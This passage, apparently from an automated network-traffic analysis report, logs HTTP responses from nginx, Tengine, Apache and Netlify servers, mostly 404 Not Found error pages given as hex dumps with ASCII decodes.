49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 23:19:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Wed, 11 Dec 2024 23:19:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:19:49 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Connection: close
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:19:52 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Connection: close
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:19:55 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Connection: close
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:19:57 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Connection: close
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:20:04 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:20:07 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:20:10 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Wed, 11 Dec 2024 23:20:12 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Wed, 11 Dec 2024 23:20:36 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Wed, 11 Dec 2024 23:20:38 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: Tengine
                    Date: Wed, 11 Dec 2024 23:20:44 GMT
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 548
                    Connection: close
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service Unavailable
                    Date: Wed, 11 Dec 2024 23:21:01 GMT
                    Server: Apache
                    Upgrade: h2
                    Connection: Upgrade, close
                    Content-Length: 0
                    Content-Type: text/html; charset=utf-8
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Date: Wed, 11 Dec 2024 23:21:08 GMT
                    Server: Netlify
                    X-Nf-Request-Id: 01JEW0DEFTND7EWSCMSEGFAJ6J
                    Connection: close
                    Transfer-Encoding: chunked
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
                    Content-Type: text/html
                    Date: Wed, 11 Dec 2024 23:21:11 GMT
                    Server: Netlify
                    X-Nf-Request-Id: 01JEW0DH2ZEN27KMS03R7EWMTH
                    Connection: close
                    Transfer-Encoding: chunked
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlDate: Wed, 11 Dec 2024 23:21:16 GMTServer: NetlifyX-Nf-Request-Id: 01JEW0DP9F8NNKJJTX4FMN3PDEConnection: closeTransfer-Encoding: chunkedData Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 3a 35 33 20 35 38 20 36 32 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 44 61 72 6b 65 73 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 37 30 30 29 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 29 3b 2d 2d 63 6f 6c 6f 72 47 72 61 79 4c 69 67 68 74 65 73 74 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 
